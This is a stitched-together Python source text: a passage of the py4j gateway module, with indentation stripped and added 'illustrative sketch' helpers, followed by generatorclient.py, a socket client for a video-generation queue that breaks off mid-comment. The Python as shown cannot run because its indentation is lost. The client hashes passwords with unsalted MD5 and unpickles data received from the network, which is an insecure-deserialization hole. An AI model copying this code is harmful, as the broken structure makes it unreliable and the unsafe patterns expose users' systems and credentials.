if name in ["__str__", "__repr__"]:
raise AttributeError
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_MEMBER_SUB_COMMAND_NAME +\
self._fqn + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if len(answer) > 1 and answer[0] == proto.SUCCESS:
if answer[1] == proto.METHOD_TYPE:
return JavaMember(
name, None, proto.STATIC_PREFIX + self._fqn,
self._gateway_client)
elif answer[1].startswith(proto.CLASS_TYPE):
return JavaClass(
self._fqn + "$" + name, self._gateway_client)
else:
return get_return_value(
answer, self._gateway_client, self._fqn, name)
else:
raise Py4JError(
"{0}.{1} does not exist in the JVM".format(self._fqn, name))
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self._converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self._gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def __call__(self, *args):
# TODO Refactor to use a mixin shared by JavaMember and JavaClass
if self._converters is not None and len(self._converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self._pool) for arg in new_args])
command = proto.CONSTRUCTOR_COMMAND_NAME +\
self._command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, None, self._fqn)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
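# --- Illustrative sketch (not part of the py4j API) -----------------------
# Using a JavaClass obtained through the jvm view: calling a constructor,
# reading a static member, and creating an array. Assumes a running
# GatewayServer; names are hypothetical.
def _example_java_class_usage():
    gateway = JavaGateway()
    string_class = gateway.jvm.java.lang.String        # a JavaClass
    greeting = string_class("hello")                    # constructor call
    max_int = gateway.jvm.java.lang.Integer.MAX_VALUE   # static field access
    string_array = gateway.new_array(string_class, 2)   # String[2] on the JVM
    string_array[0] = greeting
    gateway.shutdown()
    return max_int, string_array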
class UserHelpAutoCompletion(object):
"""
Type a package name or a class name.
For example with a JVMView called view:
>>> o = view.Object() # create a java.lang.Object
>>> random = view.jvm.java.util.Random() # create a java.util.Random
The default JVMView is in the gateway and is called:
>>> gateway.jvm
By default, java.lang.* is available in the view. To
add additional Classes/Packages, do:
>>> from py4j.java_gateway import java_import
>>> java_import(gateway.jvm, "com.example.Class1")
>>> instance = gateway.jvm.Class1()
Package and class completions are only available for
explicitly imported Java classes. For example, after
java_import(gateway.jvm, "com.example.Class1"), Class1 will appear
in the completions.
"""
KEY = "<package or class name>"
class JavaPackage(object):
"""A `JavaPackage` represents part of a Java package from which Java
classes can be accessed.
Usually, `JavaPackage` instances are not initialized using their constructor;
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang`.
"""
def __init__(self, fqn, gateway_client, jvm_id=None):
self._fqn = fqn
self._gateway_client = gateway_client
if jvm_id is None:
    self._jvm_id = proto.DEFAULT_JVM_ID
else:
    self._jvm_id = jvm_id
def __dir__(self):
return [UserHelpAutoCompletion.KEY]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion
if name in ["__str__", "__repr__"]:
raise AttributeError
if name == "__call__":
raise Py4JError("Trying to call a package.")
new_fqn = self._fqn + "." + name
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME +\
new_fqn + "\n" +\
self._jvm_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(new_fqn, self._gateway_client, self._jvm_id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
raise Py4JError("{0} does not exist in the JVM".format(new_fqn))
class JVMView(object):
"""A `JVMView` allows access to the Java Virtual Machine of a
`JavaGateway`.
This can be used to reference static members (fields and methods) and
to call constructors.
"""
def __init__(self, gateway_client, jvm_name, id=None, jvm_object=None):
self._gateway_client = gateway_client
self._jvm_name = jvm_name
if id is not None:
self._id = id
elif jvm_object is not None:
self._id = proto.REFERENCE_TYPE + jvm_object._get_object_id()
# So that both JVMView instances (on Python and Java) have the
# same lifecycle. Theoretically, JVMView could inherit from
# JavaObject, but I would like to avoid the use of reflection
# for regular Py4J classes.
self._jvm_object = jvm_object
self._dir_sequence_and_cache = (None, [])
def __dir__(self):
command = proto.DIR_COMMAND_NAME +\
proto.DIR_JVMVIEW_SUBCOMMAND_NAME +\
self._id + "\n" +\
get_command_part(self._dir_sequence_and_cache[0]) +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
    answer, self._gateway_client, self._id, "__dir__")
if return_value is not None:
result = return_value.split("\n")
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._dir_sequence_and_cache = (
result[0], result[1:] + [UserHelpAutoCompletion.KEY])
return self._dir_sequence_and_cache[1][:]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion()
answer = self._gateway_client.send_command(
proto.REFLECTION_COMMAND_NAME +
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME + name + "\n" + self._id +
"\n" + proto.END_COMMAND_PART)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(name, self._gateway_client, jvm_id=self._id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
_, error_message = get_error_message(answer)
message = compute_exception_message(
"{0} does not exist in the JVM".format(name), error_message)
raise Py4JError(message)
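# --- Illustrative sketch (not part of the py4j API) -----------------------
# Creating an isolated JVM view so that imports made in one Python module do
# not leak into another. Assumes a running GatewayServer; the view name is
# hypothetical.
def _example_jvm_view_usage():
    gateway = JavaGateway()
    module_view = gateway.new_jvm_view("my_module_view")
    # java_import only affects this view, not gateway.jvm or other views.
    java_import(module_view, "java.util.ArrayList")
    items = module_view.ArrayList()
    items.add("first")
    gateway.shutdown()
    return items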
class GatewayProperty(object):
"""Object shared by callbackserver, gateway, and connections.
"""
def __init__(self, auto_field, pool, enable_memory_management=True):
self.auto_field = auto_field
self.pool = pool
self.enable_memory_management = enable_memory_management
class JavaGateway(object):
"""A `JavaGateway` is the main interaction point between a Python VM and
a JVM.
* A `JavaGateway` instance is connected to a `Gateway` instance on the
Java side.
* The `entry_point` field of a `JavaGateway` instance is connected to
the `Gateway.entryPoint` instance on the Java side.
* The `java_gateway_server` field of a `JavaGateway` instance is connected
to the `GatewayServer` instance on the Java side.
* The `jvm` field of `JavaGateway` enables the user to access classes, static
members (fields and methods) and to call constructors.
Methods that are not defined by `JavaGateway` are always redirected to
`entry_point`. For example, ``gateway.doThat()`` is equivalent to
``gateway.entry_point.doThat()``. This is a trade-off between convenience
and potential confusion.
"""
def __init__(
self, gateway_client=None, auto_field=False,
python_proxy_port=DEFAULT_PYTHON_PROXY_PORT,
start_callback_server=False, auto_convert=False, eager_load=False,
gateway_parameters=None, callback_server_parameters=None,
python_server_entry_point=None):
"""
:param gateway_parameters: An instance of `GatewayParameters` used to
configure the various options of the gateway.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
callback server. Must be provided to start a callback server.
Otherwise, callbacks won't be available.
:param python_server_entry_point: can be requested by the Java side if
Java is driving the communication.
"""
self.gateway_parameters = gateway_parameters
if not gateway_parameters:
self.gateway_parameters = GatewayParameters(
auto_field=auto_field, auto_convert=auto_convert,
eager_load=eager_load)
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
# No parameters were provided so do not autostart callback server.
# TODO BASE 64
raw_token = unescape_new_line(self.gateway_parameters.auth_token)
self.callback_server_parameters = CallbackServerParameters(
port=python_proxy_port, eager_load=False,
auth_token=raw_token)
# Check for deprecation warnings
if auto_field:
deprecated("JavaGateway.auto_field", "1.0", "GatewayParameters")
if auto_convert:
deprecated("JavaGateway.auto_convert", "1.0", "GatewayParameters")
if eager_load:
deprecated("JavaGateway.eager_load", "1.0", "GatewayParameters")
if start_callback_server:
deprecated(
"JavaGateway.start_callback_server and python_proxy_port",
"1.0", "CallbackServerParameters")
self.callback_server_parameters.eager_load = True
if gateway_client:
deprecated("JavaGateway.gateway_client", "1.0",
"GatewayParameters")
else:
gateway_client = self._create_gateway_client()
self.python_server_entry_point = python_server_entry_point
self._python_proxy_port = python_proxy_port
self.gateway_property = self._create_gateway_property()
# Setup gateway client
self.set_gateway_client(gateway_client)
# Setup callback server property
self._callback_server = None
if self.gateway_parameters.eager_load:
self._eager_load()
if self.callback_server_parameters.eager_load:
self.start_callback_server(self.callback_server_parameters)
def _create_gateway_client(self):
gateway_client = GatewayClient(
gateway_parameters=self.gateway_parameters)
return gateway_client
def _create_gateway_property(self):
gateway_property = GatewayProperty(
self.gateway_parameters.auto_field, PythonProxyPool(),
self.gateway_parameters.enable_memory_management)
if self.python_server_entry_point:
gateway_property.pool.put(
self.python_server_entry_point, proto.ENTRY_POINT_OBJECT_ID)
return gateway_property
def set_gateway_client(self, gateway_client):
"""Sets the gateway client for this JavaGateway. This sets the
appropriate gateway_property and resets the main jvm view (self.jvm).
This is for advanced usage only and should only be done before the
gateway is loaded.
"""
if self.gateway_parameters.auto_convert:
gateway_client.converters = proto.INPUT_CONVERTER
else:
gateway_client.converters = None
gateway_client.gateway_property = self.gateway_property
self._gateway_client = gateway_client
self.entry_point = JavaObject(
proto.ENTRY_POINT_OBJECT_ID, self._gateway_client)
self.java_gateway_server = JavaObject(
proto.GATEWAY_SERVER_OBJECT_ID, self._gateway_client)
self.jvm = JVMView(
self._gateway_client, jvm_name=proto.DEFAULT_JVM_NAME,
id=proto.DEFAULT_JVM_ID)
def __getattr__(self, name):
return self.entry_point.__getattr__(name)
def _eager_load(self):
try:
self.jvm.System.currentTimeMillis()
except Exception:
self.shutdown()
raise
def get_callback_server(self):
return self._callback_server
def start_callback_server(self, callback_server_parameters=None):
"""Starts the callback server.
:param callback_server_parameters: parameters to use to start the
server. If not provided, it will use the gateway callback server
parameters.
:rtype: Returns True if the server was started by this call or False if
it was already started (you cannot have more than one started
callback server).
"""
if self._callback_server:
return False
if not callback_server_parameters:
callback_server_parameters = self.callback_server_parameters
self._callback_server = self._create_callback_server(
callback_server_parameters)
try:
self._callback_server.start()
except Py4JNetworkError:
# Clean up ourselves before raising the exception.
self.shutdown()
self._callback_server = None
raise
return True
def _create_callback_server(self, callback_server_parameters):
callback_server = CallbackServer(
self.gateway_property.pool, self._gateway_client,
callback_server_parameters=callback_server_parameters)
return callback_server
def new_jvm_view(self, name="custom jvm"):
"""Creates a new JVM view with its own imports. A JVM view ensures
that the import made in one view does not conflict with the import
of another view.
Generally, each Python module should have its own view (to replicate
Java behavior).
:param name: Optional name of the jvm view. Does not need to be
unique, i.e., two distinct views can have the same name
(internally, they will have a distinct id).
:rtype: A JVMView instance (same class as the gateway.jvm instance).
"""
command = proto.JVMVIEW_COMMAND_NAME +\
proto.JVM_CREATE_VIEW_SUB_COMMAND_NAME +\
get_command_part(name) +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
java_object = get_return_value(answer, self._gateway_client)
return JVMView(
gateway_client=self._gateway_client, jvm_name=name,
jvm_object=java_object)
def new_array(self, java_class, *dimensions):
"""Creates a Java array of type `java_class` of `dimensions`
:param java_class: The :class:`JavaClass` instance representing the
type of the array.
:param dimensions: A list of dimensions of the array. For example
`[1,2]` would produce an `array[1][2]`.
:rtype: A :class:`JavaArray <py4j.java_collections.JavaArray>`
instance.
"""
if len(dimensions) == 0:
raise Py4JError("new arrays must have at least one dimension")
command = proto.ARRAY_COMMAND_NAME +\
proto.ARRAY_CREATE_SUB_COMMAND_NAME +\
get_command_part(java_class._fqn)
for dimension in dimensions:
command += get_command_part(dimension)
command += proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return get_return_value(answer, self._gateway_client)
def shutdown(self, raise_exception=False):
"""Shuts down the :class:`GatewayClient` and the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
try:
self._gateway_client.shutdown_gateway()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
self.shutdown_callback_server()
def shutdown_callback_server(self, raise_exception=False):
"""Shuts down the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
if self._callback_server is None:
# Nothing to shutdown
return
try:
self._callback_server.shutdown()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
def close_callback_server(self, raise_exception=False):
"""Closes the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`
connections.
:param raise_exception: If `True`, raise an exception if an error
occurs while closing the callback server connections
(very likely with sockets).
"""
if self._callback_server is None:
# Nothing to shutdown
return
try:
self._callback_server.close()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while closing callback server",
exc_info=True)
def restart_callback_server(self):
"""Shuts down the callback server (if started) and restarts a new one.
"""
self.shutdown_callback_server()
self._callback_server = None
self.start_callback_server(self.callback_server_parameters)
def close(
self, keep_callback_server=False,
close_callback_server_connections=False):
"""Closes all gateway connections. A connection will be reopened if
necessary (e.g., if a :class:`JavaMethod` is called).
:param keep_callback_server: if `True`, the callback server is not
shut down. Mutually exclusive with
close_callback_server_connections.
:param close_callback_server_connections: if `True`, close all
callback server connections.
"""
self._gateway_client.close()
if not keep_callback_server:
deprecated(
"JavaGateway.close.keep_callback_server", "1.0",
"JavaGateway.shutdown_callback_server")
self.shutdown_callback_server()
elif close_callback_server_connections:
self.close_callback_server()
def detach(self, java_object):
"""Makes the Java Gateway dereference this object.
The equivalent of this method is called when a JavaObject instance
is garbage collected on the Python side. This method, or gc.collect(),
should still be invoked when memory is limited or when too many objects
are created on the Java side.
:param java_object: The JavaObject instance to dereference (free) on
the Java side.
"""
java_object._detach()
def help(self, var, pattern=None, short_name=True, display=True):
"""Displays a help page about a class or an object.
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get\*Foo" may return getMyFoo, getFoo, getFooBar, but not
bargetFoo. The pattern is matched against the entire signature.
To match only the name of a method, use "methodName(\*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
return gateway_help(
self._gateway_client, var, pattern, short_name, display)
@classmethod
def launch_gateway(
cls, port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=True, java_path="java",
create_new_process_group=False, enable_auth=False):
"""Launch a `Gateway` in a new Java process and create a default
:class:`JavaGateway <py4j.java_gateway.JavaGateway>` to connect to
it.
See :func:`launch_gateway <py4j.java_gateway.launch_gateway>` for more
information about this function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the
classpath should be specified using the `classpath` parameter,
not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout.
If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param redirect_stderr: where to redirect the JVM stderr.
If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param daemonize_redirect: if True, the consumer threads will be
daemonized and will not prevent the main Python process from
exiting. This means the file descriptors (stderr, stdout,
redirect_stderr, redirect_stdout) might not be properly closed.
This is not usually a problem, but in case of errors related
to file descriptors, set this flag to False.
:param java_path: If None, Py4J will use $JAVA_HOME/bin/java if
$JAVA_HOME is defined, otherwise it will use "java".
:param create_new_process_group: If True, the JVM is started in a new
process group. This ensures that signals sent to the parent Python
process are not forwarded to the JVM. For example, sending
Ctrl-C/SIGINT won't interrupt the JVM. If the python process dies,
the Java process will stay alive, which may be a problem in some
scenarios.
:param enable_auth: If True, the server will require clients to provide
an authentication token when connecting.
:rtype: a :class:`JavaGateway <py4j.java_gateway.JavaGateway>`
connected to the `Gateway` server.
"""
_ret = launch_gateway(
port, jarpath, classpath, javaopts, die_on_exit,
redirect_stdout=redirect_stdout, redirect_stderr=redirect_stderr,
daemonize_redirect=daemonize_redirect, java_path=java_path,
create_new_process_group=create_new_process_group,
enable_auth=enable_auth)
if enable_auth:
_port, _auth_token = _ret
else:
_port, _auth_token = _ret, None
gateway = JavaGateway(
gateway_parameters=GatewayParameters(port=_port,
auth_token=_auth_token))
return gateway
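# --- Illustrative sketch (not part of the py4j API) -----------------------
# A typical end-to-end flow with JavaGateway.launch_gateway (see the
# classmethod above): start the JVM, call into it, render a help page, and
# shut everything down. Assumes the py4j jar is installed where
# launch_gateway can find it; names are hypothetical.
def _example_gateway_lifecycle():
    gateway = JavaGateway.launch_gateway(die_on_exit=True)
    # java.lang.* is available on the default jvm view without imports.
    millis = gateway.jvm.System.currentTimeMillis()
    # help() returns the documentation page as a string when display=False.
    page = gateway.help(gateway.jvm.java.lang.String, display=False)
    gateway.shutdown()
    return millis, page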
# CALLBACK SPECIFIC
class CallbackServer(object):
"""The CallbackServer is responsible for receiving call back connection
requests from the JVM. Usually connections are reused on the Java side,
but there is at least one connection per concurrent thread.
"""
def __init__(
self, pool, gateway_client, port=DEFAULT_PYTHON_PROXY_PORT,
address=DEFAULT_ADDRESS, callback_server_parameters=None):
"""
:param pool: the pool responsible for tracking Python objects passed to
the Java side.
:param gateway_client: the gateway client used to call Java objects.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
callback server.
"""
self.gateway_client = gateway_client
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
deprecated(
"CallbackServer.port and address", "1.0",
"CallbackServerParameters")
self.callback_server_parameters = CallbackServerParameters(
address=address, port=port)
self.port = self.callback_server_parameters.port
self.address = self.callback_server_parameters.address
self.ssl_context = self.callback_server_parameters.ssl_context
self.pool = pool
self.connections = WeakSet()
# The lock is used to isolate critical regions like connection creation.
# Some code can raise exceptions when run in parallel, but they will be
# caught and dealt with.
self.lock = RLock()
self.is_shutdown = False
self.is_shutting_down = False
def start(self):
"""Starts the CallbackServer. This method should be called by the
client instead of run()."""
af_type = socket.getaddrinfo(self.address, self.port)[0][0]
self.server_socket = socket.socket(af_type, socket.SOCK_STREAM)
set_reuse_address(self.server_socket)
try:
self.server_socket.bind((self.address, self.port))
# 4-tuple for ipv6, 2-tuple for ipv4
info = self.server_socket.getsockname()
self._listening_address = info[0]
self._listening_port = info[1]
except Exception as e:
msg = "An error occurred while trying to start the callback "\
"server ({0}:{1})".format(self.address, self.port)
logger.exception(msg)
raise Py4JNetworkError(msg, e)
# Maybe the thread needs to be cleaned up?
self.thread = Thread(target=self.run)
# Default is False
self.thread.daemon = self.callback_server_parameters.daemonize
self.thread.start()
def get_listening_port(self):
"""Returns the port on which the callback server is listening to.
Different than `port` when port is 0.
"""
return self._listening_port
def get_listening_address(self):
"""Returns the address on which the callback server is listening to.
May be different than `address` if `address` was an alias (e.g.,
localhost).
"""
return self._listening_address
def run(self):
"""Starts listening and accepting connection requests.
This method is called when invoking `CallbackServer.start()`. A
CallbackServer instance is created and started automatically when
a :class:`JavaGateway <py4j.java_gateway.JavaGateway>` instance is
created.
"""
try:
with self.lock:
self.is_shutdown = False
logger.info("Callback Server Starting")
self.server_socket.listen(5)
logger.info(
"Socket listening on {0}".
format(smart_decode(self.server_socket.getsockname())))
server_started.send(
self, server=self)
read_list = [self.server_socket]
while not self.is_shutdown:
readable, writable, errored = select.select(
read_list, [], [],
self.callback_server_parameters.accept_timeout)
if self.is_shutdown:
break
for s in readable:
socket_instance, _ = self.server_socket.accept()
if self.callback_server_parameters.read_timeout:
socket_instance.settimeout(
self.callback_server_parameters.read_timeout)
if self.ssl_context:
socket_instance = self.ssl_context.wrap_socket(
socket_instance, server_side=True)
input = socket_instance.makefile("rb")
connection = self._create_connection(
socket_instance, input)
with self.lock:
if not self.is_shutdown:
self.connections.add(connection)
connection.start()
server_connection_started.send(
self, connection=connection)
else:
quiet_shutdown(connection.socket)
quiet_close(connection.socket)
except Exception as e:
if self.is_shutdown:
logger.info("Error while waiting for a connection.")
else:
server_connection_error.send(
self, error=e)
logger.exception("Error while waiting for a connection.")
server_stopped.send(self, server=self)
def _create_connection(self, socket_instance, stream):
connection = CallbackConnection(
self.pool, stream, socket_instance, self.gateway_client,
self.callback_server_parameters, self)
return connection
def close(self):
"""Closes all active callback connections
"""
logger.info("Closing down callback connections from CallbackServer")
with self.lock:
temp_connections = list(self.connections)
for connection in temp_connections:
quiet_close(connection)
def shutdown(self):
"""Stops listening and accepting connection requests. All live
connections are closed.
This method can safely be called by another thread.
"""
logger.info("Callback Server Shutting Down")
pre_server_shutdown.send(self, server=self)
with self.lock:
try:
if self.is_shutting_down:
# Do not allow calling shutdown while shutdown is
# executing. Alternative would be to not use a
# reentrant lock, but we
# would need to check all the other uses of this lock.
return
self.is_shutting_down = True
self.is_shutdown = True
quiet_shutdown(self.server_socket)
quiet_close(self.server_socket)
self.server_socket = None
temp_connections = list(self.connections)
for connection in temp_connections:
connection.close()
self.pool.clear()
finally:
self.is_shutting_down = False
self.thread.join()
self.thread = None
post_server_shutdown.send(self, server=self)
class CallbackConnection(Thread):
"""A `CallbackConnection` receives callbacks and garbage collection
requests from the Java side.
"""
def __init__(
self, pool, input, socket_instance, gateway_client,
callback_server_parameters, callback_server):
super(CallbackConnection, self).__init__()
self.pool = pool
self.input = input
self.socket = socket_instance
self.gateway_client = gateway_client
# TODO Remove in 1.0. Take it from the callback_server directly
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
# TODO Remove in 1.0. This should never be the case.
self.callback_server_parameters = CallbackServerParameters()
self.callback_server = callback_server
self.daemon = self.callback_server_parameters.daemonize_connections
def run(self):
logger.info("Callback Connection ready to receive messages")
reset = False
authenticated = self.callback_server_parameters.auth_token is None
try:
while True:
command = smart_decode(self.input.readline())[:-1]
if not authenticated:
token = self.callback_server_parameters.auth_token
# Will raise an exception if auth fails in any way.
authenticated = do_client_auth(
command, self.input, self.socket, token)
continue
obj_id = smart_decode(self.input.readline())[:-1]
logger.info(
"Received command {0} on object id {1}".
format(command, obj_id))
if obj_id is None or len(obj_id.strip()) == 0:
break
if command == proto.CALL_PROXY_COMMAND_NAME:
return_message = self._call_proxy(obj_id, self.input)
self.socket.sendall(return_message.encode("utf-8"))
elif command == proto.GARBAGE_COLLECT_PROXY_COMMAND_NAME:
self.input.readline()
del(self.pool[obj_id])
self.socket.sendall(
proto.SUCCESS_RETURN_MESSAGE.encode("utf-8"))
else:
logger.error("Unknown command {0}".format(command))
# We're sending something to prevent blocking, but at this
# point, the protocol is broken.
self.socket.sendall(
proto.ERROR_RETURN_MESSAGE.encode("utf-8"))
except Py4JAuthenticationError:
reset = True
logger.exception("Could not authenticate connection.")
except socket.timeout:
reset = True
logger.info(
"Timeout while callback connection was waiting for"
"a message", exc_info=True)
except Exception:
# This is a normal exception...
logger.info(
"Error while callback connection was waiting for"
"a message", exc_info=True)
self.close(reset)
def close(self, reset=False):
logger.info("Closing down callback connection")
if reset:
set_linger(self.socket)
else:
# Send shutdown before closing stream and socket
quiet_shutdown(self.socket)
quiet_close(self.input)
quiet_close(self.socket)
already_closed = self.socket is None
self.socket = None
self.input = None
if not already_closed:
server_connection_stopped.send(
self.callback_server, connection=self)
def _call_proxy(self, obj_id, input):
if obj_id not in self.pool:
return proto.RETURN_MESSAGE + proto.ERROR +\
get_command_part('Object ID unknown', self.pool)
try:
method = smart_decode(input.readline())[:-1]
params = self._get_params(input)
return_value = getattr(self.pool[obj_id], method)(*params)
return proto.RETURN_MESSAGE + proto.SUCCESS +\
get_command_part(return_value, self.pool)
except Exception as e:
logger.exception("There was an exception while executing the "
"Python Proxy on the Python Side.")
if self.callback_server_parameters.propagate_java_exceptions and\
isinstance(e, Py4JJavaError):
java_exception = e.java_exception
else:
java_exception = traceback.format_exc()
return proto.RETURN_MESSAGE + proto.ERROR +\
get_command_part(java_exception, self.pool)
def _get_params(self, input):
params = []
temp = smart_decode(input.readline())[:-1]
while temp != proto.END:
param = get_return_value("y" + temp, self.gateway_client)
params.append(param)
temp = smart_decode(input.readline())[:-1]
return params
class PythonProxyPool(object):
"""A `PythonProxyPool` manages proxies that are passed to the Java side.
A proxy is a Python class that implements a Java interface.
A proxy has an internal class named `Java` with a member named
`implements` which is a list of fully qualified names (string) of the
implemented interfaces.
The `PythonProxyPool` implements a subset of the dict interface:
`pool[id]`, `del(pool[id])`, `pool.put(proxy)`, `pool.clear()`,
`id in pool`, `len(pool)`.
The `PythonProxyPool` is thread-safe.
"""
def __init__(self):
self.lock = RLock()
self.dict = {}
self.next_id = 0
def put(self, object, force_id=None):
"""Adds a proxy to the pool.
:param object: The proxy to add to the pool.
:rtype: A unique identifier associated with the object.
"""
with self.lock:
if force_id:
id = force_id
else:
id = proto.PYTHON_PROXY_PREFIX + smart_decode(self.next_id)
self.next_id += 1
self.dict[id] = object
return id
def __getitem__(self, key):
with self.lock:
return self.dict[key]
def __delitem__(self, key):
with self.lock:
del(self.dict[key])
def clear(self):
with self.lock:
self.dict.clear()
def __contains__(self, key):
with self.lock:
return key in self.dict
def __len__(self):
with self.lock:
return len(self.dict)
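# --- Illustrative sketch (not part of the py4j API) -----------------------
# A Python object that can be handed to the Java side as a proxy. The nested
# Java class with an `implements` list is what the PythonProxyPool and
# CallbackServer machinery expect; the interface name com.example.Listener is
# hypothetical.
class _ExamplePythonListener(object):
    """Implements a hypothetical com.example.Listener interface in Python."""

    def notify(self, event):
        # Invoked from the JVM through a CallbackConnection.
        return "ack: {0}".format(event)

    class Java:
        implements = ["com.example.Listener"]

# Such a proxy is only reachable from Java when the gateway was created with
# callback support, e.g.
# JavaGateway(callback_server_parameters=CallbackServerParameters()), and the
# instance is passed to a Java method expecting com.example.Listener.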
# Basic registration
register_output_converter(
proto.REFERENCE_TYPE,
lambda target_id, gateway_client: JavaObject(target_id, gateway_client))
if PY4J_SKIP_COLLECTIONS not in os.environ or\
os.environ[PY4J_SKIP_COLLECTIONS].lower() not in PY4J_TRUE:
__import__("py4j.java_collections")
|
generatorclient.py
|
import socket
from threading import Thread
import datetime
import pickle
import hashlib
import youtubequeue
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
last_upload_times = None
isRequestingScripts = False
# Connect the socket to the port where the server is listening
server_address = ('localhost', 11000)
def flagscript(scriptno, flagtype):
print("%s VID GEN CLIENT requesting to flag script" % datetime.datetime.now())
payload = ("flag-scripts", scriptno, flagtype)
sendToServer(sock, payload)
def updateUploadDetails(scriptno, timeuploaded, scheduledrelease):
    payload = ("fin-script", scriptno, timeuploaded, scheduledrelease)
sendToServer(sock, payload)
def login(username, password):
payload = ("login-attempt-generator", username, hashlib.md5(password.encode()).hexdigest())
sendToServer(sock, payload)
def getLastUploadedScripts():
print("%s VID GEN CLIENT requesting last uploaded vids" % datetime.datetime.now())
payload = ("last-uploaded",)
sendToServer(sock, payload)
def sendToServer(server, payloadattachment):
payload_attach = pickle.dumps(payloadattachment)
HEADERSIZE = 10
payload = bytes(f"{len(payload_attach):<{HEADERSIZE}}", 'utf-8') + payload_attach
server.sendall(payload)
# change scriptIBuffer to scriptnos
def requestScripts(current_scripts):
global isRequestingScripts
isRequestingScripts = True
print("%s VID GEN CLIENT requesting scripts current (%s)" % (datetime.datetime.now(), current_scripts))
payload = ("video-generator-request-scripts", current_scripts)
sendToServer(sock, payload)
def connectToServer():
print('video generator connecting to %s port %s' % server_address)
try:
sock.connect(server_address)
except ConnectionRefusedError:
input("Could not connect to server. Press enter to continue")
exit()
thread = Thread(target=downloadListenThread)
thread.start()
def downloadListenThread():
global last_upload_times, isRequestingScripts
print("Client listen thread active")
HEADERSIZE = 10
while True:
full_msg = b''
new_msg = True
while True:
try:
buf = sock.recv(2048)
except OSError:
# happens when disconnecting
break
if new_msg:
msglen = int(buf[:HEADERSIZE])
print("%s VID GEN CLIENT new message (%s)" %( datetime.datetime.now(), msglen))
new_msg = False
full_msg += buf
#print("%s VID GEN CLIENT received %s%% (%s/%s)" % (datetime.datetime.now(), round(len(full_msg) / msglen * 100, 2), str(len(full_msg) / 1000000) + "MB", str(msglen / 1000000) + "MB"))
if len(full_msg) - HEADERSIZE == msglen:
print("%s VID GEN CLIENT received full message (%s)" % (datetime.datetime.now(), len(full_msg) - HEADERSIZE))
incomingdata = pickle.loads(full_msg[HEADERSIZE:])
new_msg = True
full_msg = b""
if incomingdata[0] == "login-success":
print("VID GEN LOGIN SUCCESS")
pass
elif incomingdata[0] == "script-send-to-generator":
scripts = incomingdata[1]
print("%s VID GEN CLIENT received %s scripts" % (
datetime.datetime.now(), len(scripts)))
for script in scripts:
youtubequeue.scriptIBuffer.append(script)
youtubequeue.parseScripts()
isRequestingScripts = False
elif incomingdata[0] == "last-uploaded":
last_times = incomingdata[1]
last_upload_times = last_times
print("%s VID GEN CLIENT received last upload times" % (
datetime.datetime.now()))
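# Illustrative helpers (assumption, not part of the original client): the wire
# format used by sendToServer/downloadListenThread is a fixed-width ASCII
# length header followed by a pickled payload. These mirror that framing
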